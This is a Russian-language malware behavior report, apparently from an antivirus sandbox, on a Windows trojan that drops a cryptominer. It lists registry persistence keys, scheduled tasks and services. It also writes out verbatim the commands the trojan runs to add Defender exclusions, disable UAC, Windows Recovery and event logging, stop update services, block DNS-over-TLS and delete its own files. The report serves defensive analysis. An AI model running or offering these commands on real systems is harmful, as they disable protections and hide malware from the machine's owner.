Техническая информация
Для обеспечения автозапуска и распространения
Модифицирует следующие ключи реестра
- [HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] 'jusched' = '%APPDATA%\jusched\jusched.exe'
- [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] 'jusched' = '"%APPDATA%\jusched\jusched.exe"'
Создает или изменяет следующие файлы
- %APPDATA%\microsoft\windows\start menu\programs\startup\jusched.lnk
- <SYSTEM32>\tasks\microsoft\windows\shell\updatedetection
- <SYSTEM32>\tasks\dialersvc64
Устанавливает следующие настройки сервисов
- [HKLM\SYSTEM\CurrentControlSet\Services\System] 'Start' = '00000002'
- [HKLM\SYSTEM\CurrentControlSet\Services\System] 'ImagePath' = '%ALLUSERSPROFILE%\System\System32.exe'
Создает следующие сервисы
- 'System' %ALLUSERSPROFILE%\System\System32.exe
Вредоносные функции
Для затруднения выявления своего присутствия в системе
блокирует:
- Компонент восстановления системы (SR)
- Средство контроля пользовательских учетных записей (UAC)
- Среду восстановления Windows (Windows Recovery Environment)
- Журнал событий Windows (Windows Event Logging)
добавляет исключения антивируса:
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath '%TEMP%\823e74549a4c\jusched.exe'
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'jusched.exe'
Запускает на исполнение
- '<SYSTEM32>\netsh.exe' advfirewall firewall add rule name="BlkDoT" dir=out action=block protocol=tcp remoteport=853 enable=yes
Внедряет код в
следующие системные процессы:
- <SYSTEM32>\dllhost.exe
- <SYSTEM32>\searchprotocolhost.exe
- <SYSTEM32>\searchfilterhost.exe
- <SYSTEM32>\dialer.exe
Изменения в файловой системе
Создает следующие файлы
- %LOCALAPPDATA%\microsoft\windows\05e8fe5b.exe
- %APPDATA%\jusched\jusched.exe
- %LOCALAPPDATA%\microsoft\windowsservices\svchost.dat
- %TEMP%\d26145181d3f\8b063e64.dll
- %TEMP%\fa8a610db7cd\470adc78.dll
- %LOCALAPPDATA%\microsoft\windows\actioncentercache\windows-systemtoast-securityandmaintenance_10_0.png
- %TEMP%\19eb17b099ee\5b29b9b3.dll
- %TEMP%\224efa4a238a\miner.exe
- %TEMP%\823e74549a4c\jusched.exe
- %ALLUSERSPROFILE%\system\system32.exe
- %WINDIR%\temp\__psscriptpolicytest_22imciai.0u2.ps1
- %WINDIR%\temp\__psscriptpolicytest_hxpgvc0o.gmx.psm1
Присваивает атрибут 'скрытый' для следующих файлов
- %LOCALAPPDATA%\microsoft\windowsservices\svchost.dat
Удаляет файлы, которые сам же создал
- %TEMP%\d26145181d3f\8b063e64.dll
- %TEMP%\fa8a610db7cd\470adc78.dll
- %WINDIR%\temp\__psscriptpolicytest_22imciai.0u2.ps1
- %WINDIR%\temp\__psscriptpolicytest_hxpgvc0o.gmx.psm1
Перемещает следующие системные файлы
- C:\recovery\windowsre\winre.wim в C:\recovery\windowsre\winre.bak
Изменяет файл HOSTS.
Сетевая активность
Подключается к
- 'ip##pi.com':80
TCP
Запросы HTTP GET
- http://ip##pi.com/line/?fi############
Другие
- '17#.#60.157.96':7878
UDP
- DNS ASK ip##pi.com
Другое
Создает и запускает на исполнение
- '%LOCALAPPDATA%\microsoft\windows\05e8fe5b.exe'
- '%TEMP%\224efa4a238a\miner.exe'
- '%TEMP%\823e74549a4c\jusched.exe'
- '%APPDATA%\jusched\jusched.exe'
- '%ALLUSERSPROFILE%\system\system32.exe'
Перезапускает анализируемый образец
Запускает на исполнение
- '<SYSTEM32>\schtasks.exe' /Query /TN "jusched" (со скрытым окном)
- '<SYSTEM32>\schtasks.exe' /Create /TN "jusched" /TR "%APPDATA%\jusched\jusched.exe" /SC ONLOGON /RL HIGHEST /F (со скрытым окном)
- '<SYSTEM32>\schtasks.exe' /Create /TN "jusched" /TR "%APPDATA%\jusched\jusched.exe" /SC ONLOGON /F (со скрытым окном)
- '<SYSTEM32>\schtasks.exe' /Query /TN "\Microsoft\Windows\Shell\UpdateDetection" (со скрытым окном)
- '<SYSTEM32>\schtasks.exe' /Delete /TN "\Microsoft\Windows\Shell\UpdateDetection" /F (со скрытым окном)
- '<SYSTEM32>\schtasks.exe' /Create /TN "\Microsoft\Windows\Shell\UpdateDetection" /TR "%APPDATA%\jusched\jusched.exe" /SC ONSTART /RU SYSTEM /RL HIGHEST /F (со скрытым окном)
- '<SYSTEM32>\dllhost.exe'
- '<SYSTEM32>\searchprotocolhost.exe'
- '<SYSTEM32>\rundll32.exe' "%TEMP%\d26145181d3f\8b063e64.dll",ExcludeMain
- '<SYSTEM32>\searchfilterhost.exe'
- '<SYSTEM32>\cmd.exe' /c powershell -NoP -W Hidden -Command "Set-ItemProperty -Path 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System' -Name 'EnableLUA' -Value 0 -Type DWord -Force"
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -NoP -W Hidden -Command "Set-ItemProperty -Path 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System' -Name 'EnableLUA' -Value 0 -Type DWord -Force"
- '<SYSTEM32>\reagentc.exe' /disable
- '<SYSTEM32>\bcdedit.exe' /set {default} bootstatuspolicy IgnoreAllFailures
- '<SYSTEM32>\bcdedit.exe' /set {bootmgr} displaybootmenu No
- '<SYSTEM32>\bcdedit.exe' /timeout 0
- '<SYSTEM32>\cmd.exe' /c wusa /uninstall /kb:890830 /quiet /norestart
- '<SYSTEM32>\sc.exe' stop UsoSvc
- '<SYSTEM32>\sc.exe' stop WaaSMedicSvc
- '<SYSTEM32>\wusa.exe' /uninstall /kb:890830 /quiet /norestart
- '<SYSTEM32>\sc.exe' stop wuauserv
- '<SYSTEM32>\sc.exe' stop bits
- '<SYSTEM32>\sc.exe' stop dosvc
- '<SYSTEM32>\powercfg.exe' /x -hibernate-timeout-ac 0
- '<SYSTEM32>\powercfg.exe' /x -hibernate-timeout-dc 0
- '<SYSTEM32>\powercfg.exe' /x -standby-timeout-ac 0
- '<SYSTEM32>\powercfg.exe' /x -standby-timeout-dc 0
- '<SYSTEM32>\dialer.exe'
- '<SYSTEM32>\sc.exe' delete "System"
- '<SYSTEM32>\sc.exe' create "System" binpath= "%ALLUSERSPROFILE%\System\System32.exe" start= "auto"
- '<SYSTEM32>\sc.exe' stop eventlog
- '<SYSTEM32>\sc.exe' start "System"
- '<SYSTEM32>\cmd.exe' /c choice /C Y /N /D Y /T 3 & Del "%TEMP%\224efa4a238a\miner.exe"
- '<SYSTEM32>\choice.exe' /C Y /N /D Y /T 3
- '%TEMP%\224efa4a238a\miner.exe' (со скрытым окном)
- '%TEMP%\823e74549a4c\jusched.exe' (со скрытым окном)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath '%TEMP%\823e74549a4c\jusched.exe' (со скрытым окном)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'jusched.exe' (со скрытым окном)
